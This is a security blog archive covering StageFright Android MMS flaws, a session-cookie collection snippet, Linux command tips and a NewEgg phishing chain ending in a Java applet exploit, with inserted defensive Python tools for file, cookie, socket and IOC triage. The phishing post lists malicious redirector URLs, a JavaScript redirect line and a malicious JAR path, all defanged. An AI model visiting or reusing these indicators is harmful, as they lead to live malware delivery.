Tuesday, August 4, 2015

Android StageFright Update

A few updates to the Android StageFright vulnerability:

First, Google has promised a patch for the issue this week, but it has not appeared yet. Second, Samsung is reported to have released a patch for its affected devices.

Blocking SMS/MMS messages from unknown senders is a good start, and you should also disable automatic download (auto-retrieve) of MMS messages. Neither step fully protects you: the vulnerable code is the media framework itself, so viewing a web page that embeds a specially crafted video can trigger the same flaw. That is what makes this issue a tricky one. How many users can honestly say they can identify a "sketchy" link or site with a high level of certainty? Watering-hole attacks and malvertising throw that precaution right out the window in any case, because the malicious content arrives through a site the user already trusts.

Over at StackExchange, this post discusses a proof-of-concept MP4 video file that appears to exploit an overflow condition in one of the StageFright components. I cannot personally vouch for the file, but I did perform a brief analysis of it in a hex editor. It appears to define a field, named 'tx3g', that is very long, possibly causing the overflow condition. Details will be released over the next day or two by Joshua Drake, aka jduck, so expect more concrete PoC information to surface by week's end.

Update: Below are links to the AOSP patches (platform/frameworks/av) for the issues. All of them fix integer overflow or underflow conditions in size handling.

https://android.googlesource.com/platform/frameworks/av/+/0e4e5a8%5E!/

https://android.googlesource.com/platform/frameworks/av/+/5c134e6%5E!/

https://android.googlesource.com/platform/frameworks/av/+/030d8d0%5E!/
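The patches above fix integer overflows in size handling, and the PoC discussed earlier carries a 'tx3g' box with a very long declared size. As an added example (not from this post, the PoC, or the AOSP patches), here is a small ISO BMFF box walker in Python that flags the size fields a parser must not trust before acting on them: a declared size that does not fit in 32 bits (so a 32-bit accumulator would wrap), one that runs past the data actually present, and one smaller than its own header. The container list, the schematic box tree and the byte strings are constructed for the example; the header layout it relies on (32-bit big-endian size and 4-byte type, with size 1 meaning a 64-bit size follows and size 0 meaning "to end of parent") is the standard one.

```python
import struct
from typing import List, NamedTuple, Optional, Tuple

# Box types whose payload is itself a sequence of boxes (a common subset;
# the list is an assumption for this example, not an exhaustive one).
CONTAINER_TYPES = {b"moov", b"trak", b"mdia", b"minf", b"stbl", b"edts", b"udta"}
UINT32_MAX = 0xFFFFFFFF


class Box(NamedTuple):
    offset: int
    size: int      # declared size, header included
    kind: bytes
    depth: int


class Finding(NamedTuple):
    offset: int
    kind: bytes
    reason: str


def read_header(data: bytes, pos: int, end: int) -> Tuple[Optional[int], bytes, int]:
    """Decode the box header at pos.

    Returns (declared size, type, header length); size is None when the
    header itself does not fit in data[pos:end].
    """
    if pos + 8 > end:
        return None, b"", 8
    size, kind = struct.unpack_from(">I4s", data, pos)
    if size == 1:                       # a 64-bit "largesize" follows the type
        if pos + 16 > end:
            return None, kind, 16
        return struct.unpack_from(">Q", data, pos + 8)[0], kind, 16
    if size == 0:                       # box extends to the end of its parent
        return end - pos, kind, 8
    return size, kind, 8


def scan_boxes(data: bytes, start: int = 0, end: Optional[int] = None,
               depth: int = 0) -> Tuple[List[Box], List[Finding]]:
    """Walk the box tree in data[start:end], flagging sizes a parser must not trust."""
    end = len(data) if end is None else end
    boxes: List[Box] = []
    findings: List[Finding] = []
    pos = start
    while pos < end:
        size, kind, hlen = read_header(data, pos, end)
        if size is None:
            findings.append(Finding(pos, kind, "truncated box header"))
            break
        boxes.append(Box(pos, size, kind, depth))
        if size < hlen:
            findings.append(Finding(pos, kind, "declared size %d is smaller than its header" % size))
            break
        if size > UINT32_MAX:
            # A parser that keeps lengths in 32-bit integers wraps this to a small
            # value, allocates for that, and then copies the real payload into it.
            findings.append(Finding(pos, kind, "size %d does not fit in 32 bits (wraps to %d)"
                                    % (size, size & UINT32_MAX)))
        if size > end - pos:
            findings.append(Finding(pos, kind, "declared size %d exceeds the %d bytes remaining"
                                    % (size, end - pos)))
            break
        if kind in CONTAINER_TYPES:
            child_boxes, child_findings = scan_boxes(data, pos + hlen, pos + size, depth + 1)
            boxes.extend(child_boxes)
            findings.extend(child_findings)
        pos += size
    return boxes, findings


def build_box(kind: bytes, payload: bytes) -> bytes:
    """Serialize a box with a 32-bit size header (used only to build samples)."""
    return struct.pack(">I4s", 8 + len(payload), kind) + payload


# Constructed samples: the tree is schematic, only the size arithmetic matters.
WELL_FORMED = build_box(b"ftyp", b"isom\x00\x00\x00\x00isom") + build_box(
    b"moov", build_box(b"trak", build_box(b"tx3g", b"\x00" * 16)))

# Same tree plus a trailing 'tx3g' box claiming ~2 GiB that the data does not contain.
OVERSIZED = WELL_FORMED + struct.pack(">I4s", 0x7FFFFFFF, b"tx3g") + b"\x00" * 16

# A largesize 'tx3g' box whose 64-bit length wraps to 16 when truncated to 32 bits.
WRAPPING = struct.pack(">I4sQ", 1, b"tx3g", 0x1_0000_0010) + b"\x00" * 16


if __name__ == "__main__":
    for label, sample in (("well-formed", WELL_FORMED), ("oversized", OVERSIZED),
                          ("wrapping", WRAPPING)):
        boxes, findings = scan_boxes(sample)
        print("%s: %d boxes, %d findings" % (label, len(boxes), len(findings)))
        for f in findings:
            print("  offset %d %s: %s" % (f.offset, f.kind.decode("latin-1"), f.reason))
```

To triage a file you received, pass its bytes to scan_boxes() and read the findings; a file with no findings can still be hostile, but one with a wrapping or overrunning size is not worth opening in a player to find out.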


Monday, July 27, 2015

StageFright: Critical Android MMS bug affects an estimated 95% of Android Devices

A flaw has been discovered affecting Android devices that allows an attacker to execute arbitrary code via an MMS message without user interaction. What does this mean? Someone, anyone, can send you a malicious MMS (an SMS, aka "text" message, with a multimedia attachment) that, upon receipt, triggers the flaw and runs the attacker's code on your phone without you doing a single thing. Here is a more detailed read by the folks who discovered it. It will likely be referred to as "StageFright", since Stagefright is the name of the affected media-playback library. There were a total of 7 issues discovered, covered by the following CVEs:

CVE-2015-1538 CVE-2015-1539 CVE-2015-3824 CVE-2015-3826 CVE-2015-3827 CVE-2015-3828 CVE-2015-3829 - See more at: http://blog.zimperium.com/experts-found-a-unicorn-in-the-heart-of-android/
Mitre: CVE-2015-1538
Mitre: CVE-2015-1539
Mitre: CVE-2015-3824
Mitre: CVE-2015-3826
Mitre: CVE-2015-3827
Mitre: CVE-2015-3828
Mitre: CVE-2015-3829

How can I protect myself? 

While a vendor patch is the only way to be fully protected, disabling auto-retrieval of MMS messages is one way to stop the attachment from being processed, and the attacker's code from running, without any interaction on your part. It does not help once you open the message yourself. I haven't seen this being talked about much yet, so spread the word!

In Hangouts:

Menu -> Settings -> SMS -> Auto retrieve MMS - uncheck this



In Messenger:

Menu -> Settings -> Advanced -> Auto-retrieve - turn this to 'off'


The bug finder, Joshua J. Drake (aka jduck), will be speaking at Black Hat USA 2015 about this issue in early August. Hopefully, patches will be delivered before then. At the very least, we all have a jump on this issue before it gets too ugly. With the large number of devices affected and the severity of the issue, it won't be long before exploit attempts are observed in the wild. Be aware.

Friday, February 15, 2013

In love with Python

Valentine's Day has come and gone, but I'm still swooning. I'm enamored with Python. Yes, Python the programming language, not the animal. Why am I vying for Python's attention?  Here's why...

import http.client  # Python 3 name for the httplib module the original used

# Open a plain HTTP connection and request the login page.
urlconn = http.client.HTTPConnection('www.somewhere')
urlconn.request("GET", "/somepath/to/login.asp")
response = urlconn.getresponse()

# The Set-Cookie header carries the session ID the server just issued,
# along with whatever attributes (path, HttpOnly, Secure) it set on it.
cookie = response.getheader('Set-Cookie')
print(cookie)
urlconn.close()


If you run this code (against a real host and path, of course!), you would receive output similar to the following:

ASPSESSIONID=AOBPFCCDFKASLMRTYWKNBCDS; path=/

With this tiny bit of code, we can gather session IDs from login pages for analysis. That data can be used to further assess the security of the login page: for example, whether the IDs are unpredictable, and whether the cookie carries the HttpOnly and Secure attributes (the sample above has neither). As written, the code collects whatever else the server puts in the Set-Cookie header as well. What else could we do here? A very simple change would allow us to collect other HTTP header information:

print(response.getheader('Server'))

This would return a response similar to the following:

Microsoft-IIS/6.0

We can also collect lots of other data, including the HTTP response code (response.status), other specific headers (response.getheaders() returns them all), or the full response body (response.read()).

Of course, this is a very rudimentary example that could be improved upon. We could make the program more flexible by taking the URL on the command line, adding error handling, and doing something more useful with the output. For now, I'll leave this as an exercise for the reader. My point here is to illustrate how quickly one can create something useful and usable for a specific purpose.
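The analysis step the post leaves open: once you have collected a batch of Set-Cookie headers by repeating the request above, what do you check? As an added example (not code from the post), the Python below parses the headers, reports whether the session cookie is missing the HttpOnly and Secure attributes, and finds the character positions that never change across samples, which is the quickest sign that an ID carries far less entropy than its length suggests. The headers are constructed for the example and the sample IDs deliberately share a long fixed prefix; a real collection would come from the request loop, one header per response.

```python
import math
from typing import Dict, List, Tuple

# Constructed Set-Cookie headers standing in for several responses from the
# same login page (not captured from a real host; the IDs are made up and
# deliberately share a long fixed prefix).
SAMPLE_SET_COOKIE_HEADERS = [
    "ASPSESSIONID=AOBPFCCDFKASLMRTYWKNBCDS; path=/",
    "ASPSESSIONID=AOBPFCCDFKASLMRTYWKNBCDT; path=/",
    "ASPSESSIONID=AOBPFCCDFKASLMRTYWKNBCEA; path=/",
    "ASPSESSIONID=AOBPFCCDFKASLMRTYWKNBCEB; path=/",
]


def parse_set_cookie(header: str) -> Tuple[str, str, Dict[str, str]]:
    """Split one Set-Cookie header into (name, value, attributes).

    Attribute names are lower-cased; valueless flags such as HttpOnly and
    Secure are stored with the value "true".
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else "true"
    return name.strip(), value.strip(), attrs


def missing_protections(attrs: Dict[str, str]) -> List[str]:
    """Attributes a session cookie should carry but this one does not."""
    missing = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")   # script can read it, so XSS can steal it
    if "secure" not in attrs:
        missing.append("Secure")     # the browser will send it over plain HTTP
    return missing


def fixed_positions(values: List[str]) -> List[int]:
    """Character positions that never change across the sampled IDs.

    A long run of fixed positions means the usable entropy is far below what
    the ID's length suggests (typical of sequential or time-derived IDs).
    """
    width = min(len(v) for v in values)
    return [i for i in range(width) if len({v[i] for v in values}) == 1]


def alphabet_bits(values: List[str]) -> float:
    """Upper bound on bits per character: log2 of the distinct symbols seen."""
    symbols = {ch for v in values for ch in v}
    return math.log2(len(symbols))


def assess(headers: List[str]) -> Dict[str, object]:
    """Run the checks above over a batch of Set-Cookie headers from one page."""
    parsed = [parse_set_cookie(h) for h in headers]
    names = {name for name, _, _ in parsed}
    if len(names) != 1:
        raise ValueError("expected one cookie name, got %r" % sorted(names))
    values = [value for _, value, _ in parsed]
    fixed = fixed_positions(values)
    length = len(values[0])
    return {
        "cookie": names.pop(),
        "samples": len(values),
        "length": length,
        "fixed_positions": fixed,
        "varying_positions": [i for i in range(length) if i not in fixed],
        "bits_per_char_upper_bound": alphabet_bits(values),
        "missing_protections": missing_protections(parsed[0][2]),
    }


if __name__ == "__main__":
    for key, val in assess(SAMPLE_SET_COOKIE_HEADERS).items():
        print("%-26s %s" % (key, val))
```

Four samples are enough to show the mechanics but not to judge a real implementation; collect a few hundred IDs before drawing conclusions, since a position that happens to be constant across four draws may simply be luck.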

Happy coding!

Thursday, January 31, 2013

Four Linux Commands You Never Knew You Needed (Until Now)

If you're like me, you've probably used open source software such as Linux and GNU utilities for some time now. In recent years, I've been involved in more research and development activities. This has led me to combine two schools of thought: that of the system administrator, and that of the developer or "power user". I've compiled a few useful but lesser-known (at least to me) commands that have turned up across projects in the course of my work. These have all saved me time in some way.

watch

Sadly, the watch command is a newer discovery for me. This ncurses-based utility runs another command repeatedly and displays its output full-screen, so you can follow how that output changes over time. Here's a quick example:

watch 'ls -la /tmp'

This displays the contents of the /tmp directory, refreshing it every 2 seconds (the default). The interval is configurable with the -n parameter:

watch -n 10 'ls -la /tmp'

The -n parameter takes seconds, so the command above refreshes its output every 10 seconds. Using watch to monitor a directory for changes is useful in many scenarios; at times I've used it to watch a process write files. Here's the one I use even more frequently, though:

watch "netstat -na |egrep '(SYN_SENT|ESTABLISHED|TIME_WAIT|FIN_WAIT_1|FIN_WAIT_2)'"

This lets you monitor the states of open network sockets as they change. Other tools can do this (ntop, for example), but watch has the advantage of being installed out of the box on most Linux distros, and since you are only manipulating command-line arguments, it is as customizable as your pipeline. Add another grep before selecting the socket state and you can filter on other criteria, such as an IP address. On newer distributions netstat may not be installed (it ships in net-tools); ss -tan reports the same sockets but abbreviates the state names (ESTAB, SYN-SENT, TIME-WAIT, FIN-WAIT-1, FIN-WAIT-2), so adjust the pattern accordingly.

Figure 1: monitoring network sockets using 'watch'.


It's worth noting that you won't need all of these socket states in most situations. If neither end has connectivity problems, you will mostly see ESTABLISHED and TIME_WAIT. SYN_SENT means the local host has sent its SYN and is still waiting for the reply, so a pile of them points to an unreachable or filtered peer (or a local process trying to reach many hosts that do not answer); that is why I find it useful for spotting problems with remote hosts. The others are included for completeness.
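watch shows you each new snapshot but leaves spotting the differences to your eyes (watch -d highlights changed characters, nothing more). As an added example (not from the post), this Python script parses the same netstat -na output, keeps only the states the one-liner above greps for, counts them, lists the peers with sockets stuck in SYN_SENT, and diffs successive snapshots so that only sockets that appeared or disappeared are printed. The two snapshots embedded in it are constructed; the monitor() function at the bottom runs the real netstat -na in a loop and assumes the Linux net-tools column layout (state in the sixth column).

```python
import subprocess
import time
from collections import Counter
from typing import Dict, List, NamedTuple, Set, Tuple

# The states the watch one-liner above greps for.
STATES_OF_INTEREST = {"SYN_SENT", "ESTABLISHED", "TIME_WAIT", "FIN_WAIT_1", "FIN_WAIT_2"}


class Conn(NamedTuple):
    proto: str
    local: str
    remote: str
    state: str


def parse_netstat(text: str) -> List[Conn]:
    """Extract TCP sockets from `netstat -na` output.

    Assumes the Linux net-tools layout: proto, recv-q, send-q, local,
    foreign, state. UDP lines have no state column and are skipped.
    """
    conns = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue
        conns.append(Conn(fields[0], fields[3], fields[4], fields[5]))
    return conns


def filter_states(conns: List[Conn], states: Set[str] = STATES_OF_INTEREST) -> List[Conn]:
    return [c for c in conns if c.state in states]


def count_by_state(conns: List[Conn]) -> Dict[str, int]:
    return dict(Counter(c.state for c in conns))


def peers_in_state(conns: List[Conn], state: str) -> Set[str]:
    """Remote hosts (port stripped) that have a socket in the given state."""
    return {c.remote.rsplit(":", 1)[0] for c in conns if c.state == state}


def diff_snapshots(before: List[Conn], after: List[Conn]) -> Tuple[Set[Conn], Set[Conn]]:
    """(appeared, disappeared) between two polls; the part watch leaves to your eyes."""
    b, a = set(before), set(after)
    return a - b, b - a


# Two constructed snapshots (not captured from a real host). Between them the
# TIME_WAIT socket expires and a new inbound SSH session appears.
SNAPSHOT_1 = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.10:22         192.168.1.20:51234      ESTABLISHED
tcp        0      0 192.168.1.10:443        203.0.113.5:40110       ESTABLISHED
tcp        0      1 192.168.1.10:53122      198.51.100.7:443        SYN_SENT
tcp        0      0 192.168.1.10:80         203.0.113.9:60001       TIME_WAIT
udp        0      0 0.0.0.0:123             0.0.0.0:*
"""
SNAPSHOT_2 = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.10:22         192.168.1.20:51234      ESTABLISHED
tcp        0      0 192.168.1.10:22         203.0.113.77:44410      ESTABLISHED
tcp        0      0 192.168.1.10:443        203.0.113.5:40110       ESTABLISHED
tcp        0      1 192.168.1.10:53122      198.51.100.7:443        SYN_SENT
udp        0      0 0.0.0.0:123             0.0.0.0:*
"""


def monitor(interval: float = 2.0) -> None:
    """Poll the real netstat like `watch -n`, but print only what changed."""
    previous: List[Conn] = []
    while True:
        out = subprocess.run(["netstat", "-na"], capture_output=True, text=True, check=True).stdout
        current = filter_states(parse_netstat(out))
        appeared, gone = diff_snapshots(previous, current)
        for c in sorted(appeared):
            print("+ %s %s -> %s %s" % c)
        for c in sorted(gone):
            print("- %s %s -> %s %s" % c)
        previous = current
        time.sleep(interval)


if __name__ == "__main__":
    monitor()
```

The first poll prints every existing socket as new, which doubles as an inventory; after that, an unexpected "+" on port 22 from an address you do not recognize is the kind of line that is easy to miss in a full-screen refresh and hard to miss here.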

whatis

Put quite simply, the whatis utility displays short summaries of man pages on the command-line.


$ whatis whatis

whatis (1)           - display manual page descriptions

Simple, but useful, right?


cal

As the name indicates, cal displays all or part of a calendar. While not an earth-shaking game-changer, the cal utility can be quite useful. Here are a few examples:

Display a full calendar for the year 2012: cal 2012

Display calendar for November 1955: cal 11 1955

Display calendar for the 8th month of the current year: cal -m 8 (BSD/ncal syntax; with the util-linux cal, -m means "Monday first", so use the month-and-year form instead)
This can also be achieved via: cal 8 2013

Figure 2: Demonstrating the 'cal' command.


Perhaps it's my nature as a "CLI guy", but I much prefer this to clicking through any of the wonky date and time widgets. I also find it much faster than most GUIs, especially when you need a date many months or years from today. What day of the week is the wife's birthday next year? cal N 2014 - done!

lsblk

List block devices (aka lsblk) is part of the util-linux package. While it's a relatively new utility to me, it certainly is useful. The default output of lsblk looks somewhat similar to that of df:

$ lsblk
NAME   MAJ:MIN RM   SIZE RO TYPE MOUNTPOINT
loop0    7:0    0 666.1M  1 loop /rofs
sda      8:0    0 465.8G  0 disk
├─sda1   8:1    0  39.2M  0 part
├─sda2   8:2    0  14.8G  0 part
└─sda3   8:3    0 450.9G  0 part
sr0     11:0    1 695.3M  0 rom  /cdrom


$ df
Filesystem     1K-blocks   Used Available Use% Mounted on
/cow             1932460 395084   1537376  21% /
udev             1924792      4   1924788   1% /dev
tmpfs             772988    876    772112   1% /run
/dev/sr0          711980 711980         0 100% /cdrom
/dev/loop0        682240 682240         0 100% /rofs
tmpfs            1932460    156   1932304   1% /tmp
none                5120      4      5116   1% /run/lock
none             1932460    180   1932280   1% /run/shm


While the output of each utility is similar, there are some real differences. First, lsblk shows every block device the kernel knows about, mounted or not (sda1 through sda3 appear above although nothing is mounted on them), whereas df only reports mounted filesystems. lsblk also lays out the partition hierarchy very clearly in the NAME column, which I find easy to read as well as convenient. Next, we have the MAJ and MIN columns, which are the Linux device major and minor numbers. The RM and RO columns, which stand for 'removable' and 'read-only' respectively, are things I wish df had been telling me all along. The TYPE column is self-explanatory, but is another example of output that I find useful.

While the default output of lsblk is great, it's also very customizable. The -o switch allows you to specify a comma-separated list of which columns are present in the output. Here's an example:

$ lsblk -o NAME,MODEL
NAME   MODEL
loop0 
sda    WDC WD5000AAKX-7
├─sda1
├─sda2
└─sda3
sr0    DVD+-RW GH70N  


This is definitely a convenient way to determine where physical disks are mapped. I no longer have to dig through dmesg output! Well... not for this reason, anyway.

If you're like me, you may have many devices attached to a physical system for various reasons. Do you have a built-in multi-card reader in your PC? Do you remember which device node maps to which slot? I don't.

$ lsblk -a -o NAME,MODEL
NAME   MODEL
ram0  
ram1  
ram2  
[ ... SNIP ... ]
loop7 
sda    WDC WD5000AAKX-7
├─sda1
├─sda2
└─sda3
sr0    DVD+-RW GH70N  
sdb    SD/MMC         
sdc    Compact Flash  
sdd    SM/xD Picture  
sde    MS/MS-Pro


Now I recall! The -a switch shows all devices, including empty ones such as the RAM disks and unused loop devices. Note that the output has been trimmed. There are many other columns available, including STATE, OWNER, GROUP, and MODE; lsblk --help lists them along with the other options.

That's all for now. I hope you find this information to be useful in your day-to-day CLI adventures.

Wednesday, January 30, 2013

Best Albums for Writing Code


If you're like me, you probably code on a somewhat regular basis. I find myself with a reason to write a new tool, script, or web page on a weekly basis. What helps you focus and get you through the process? For me, music is the answer. I've created a collection on Referly of the best albums for writing code. Check it out here. Feel free to leave your comments about what music motivates you. I'd love to hear them.

Monday, April 9, 2012

NewEgg Phishing Scam leads to Java-based exploit?

If you haven't heard yet, there is a phishing email going around masquerading as a NewEgg payment verification.

(Sanitized image from Outlook with no images loaded)

Not surprisingly, the links all point to an initial URL: hxxp://ftp[dot]qsari[dot]org/YtWvZiiG/index.html, which contains references to 3 JavaScript files (I assume for redundancy; URLs altered to prevent clicking):

hxxp://congress-assistants[dot]fi/idm2TZP1/js.js
hxxp://mobileproductivemoneymaking[dot]com/oExXoVCh/js.js
hxxp://primasaleorganik[dot]com/3N6zKxSS/js.js

All of these files contain JavaScript pointing to the same location (URLs altered to prevent clicking):

document.location='hxxp://216[dot]224[dot]182[dot]94/showthread.php?t=d7ad916d1c0396ff';

This points to the final page, which contains a Java applet. The applet's file path is obfuscated, partly with hex entities. It loads the archive with parameters:

hxxp://216[dot]224[dot]182[dot]94/data/Klot.jar?a=1

It passes a "code" parameter, code="ta.tc", which names the class the applet starts from. The archive contains 3 files:

ta/ta.class
ta/tb.class
ta/tc.class
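Walking a chain like this one by hand means copying URLs out of several obfuscated files and defanging each one before it goes into a write-up. As an added example (not code from this post), the Python below automates those steps: it decodes the HTML hex entities and JavaScript \xNN escapes used to hide paths, pulls the document.location targets and applet archive URLs out of the decoded text, and defangs the results (hxxp, [.]) so they can be pasted anywhere safely. The two snippets it runs on are constructed with RFC 5737 documentation addresses, not the campaign's real hosts, and which encodings a given dropper uses is an assumption, so extend decode_obfuscation() as you meet others.

```python
import html
import re
from typing import List

# document.location = '...', window.location.href = "...", and friends.
REDIRECT_RE = re.compile(
    r"""(?:document|window|top|self)\.location(?:\.href)?\s*=\s*(['"])(.*?)\1""",
    re.IGNORECASE)
# <applet ... archive="..."> : the JAR the landing page pulls down.
APPLET_RE = re.compile(r"""<applet[^>]*?\barchive\s*=\s*(['"])(.*?)\1""",
                       re.IGNORECASE | re.DOTALL)
JS_HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_obfuscation(text: str) -> str:
    """Undo the two encodings assumed here: HTML entities (&#x68;) and JS \\xNN escapes."""
    text = html.unescape(text)
    return JS_HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), text)


def extract_redirects(js: str) -> List[str]:
    """URLs assigned to *.location in a redirector script."""
    return [m.group(2) for m in REDIRECT_RE.finditer(js)]


def extract_applet_archives(page: str) -> List[str]:
    """archive= attributes of <applet> tags in a landing page."""
    return [m.group(2) for m in APPLET_RE.finditer(page)]


def defang(url: str) -> str:
    """http://203.0.113.10/x -> hxxp://203[.]0[.]113[.]10/x, safe to paste anywhere."""
    scheme, sep, rest = url.partition("://")
    if not sep:
        scheme, rest = "", url
    host, slash, path = rest.partition("/")
    out = host.replace(".", "[.]") + slash + path
    return (scheme.replace("http", "hxxp") + "://" + out) if sep else out


def refang(url: str) -> str:
    """Inverse of defang(), also accepting the [dot] convention used in this post."""
    return url.replace("hxxp", "http").replace("[.]", ".").replace("[dot]", ".")


def triage(snippets: List[str]) -> List[str]:
    """Decode each snippet, pull every redirect/applet URL, return them defanged, in order."""
    seen, found = set(), []
    for snippet in snippets:
        decoded = decode_obfuscation(snippet)
        for url in extract_redirects(decoded) + extract_applet_archives(decoded):
            if url not in seen:
                seen.add(url)
                found.append(defang(url))
    return found


# Constructed stand-ins for a redirector js.js and the landing page (RFC 5737
# documentation addresses, not the campaign's real hosts).
SAMPLE_JS = "document.location='http://203.0.113.10/showthread.php?t=0123456789abcdef';"
SAMPLE_HTML = ('<applet archive="&#x68;ttp://203.0.113.10/\\x64\\x61\\x74\\x61/applet.jar?a=1"'
               ' code="ta.tc" width="1" height="1"></applet>')


if __name__ == "__main__":
    for url in triage([SAMPLE_JS, SAMPLE_HTML]):
        print(url)
```

Feed it the files in the order you fetched them and the output is the chain in a form you can drop straight into an e-mail; refang() gets you back to something you can actually request from an isolated analysis host.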

At this point, we all know this is surely a Java exploit... Blackhole exploit kit comes to mind.  Here are the VirusTotal results (you will see my initial analysis there, which is contained in this blog post):

https://www.virustotal.com/file/49fd75119fdb50902e7e265b0243cc793eb4d9bd4675271e1853a04e194a3e18/analysis/

As any malware in an active phishing campaign would, this file scores a not-so-shocking 0/42 detections. I wonder how many users clicked this? Luckily, the individuals who received it did not. Instead, they forwarded it to me for advice. Whew!

Coming up, I'll attempt to dig into analyzing the decompiled Java code...

Tuesday, March 20, 2012

Greetings to sympt0m

My friend David Keaton, aka sympt0m has created a blog.  I'm excited to see what he has to say. I'm ready to absorb that reverse engineering knowledge you have, buddy.  Let it fly!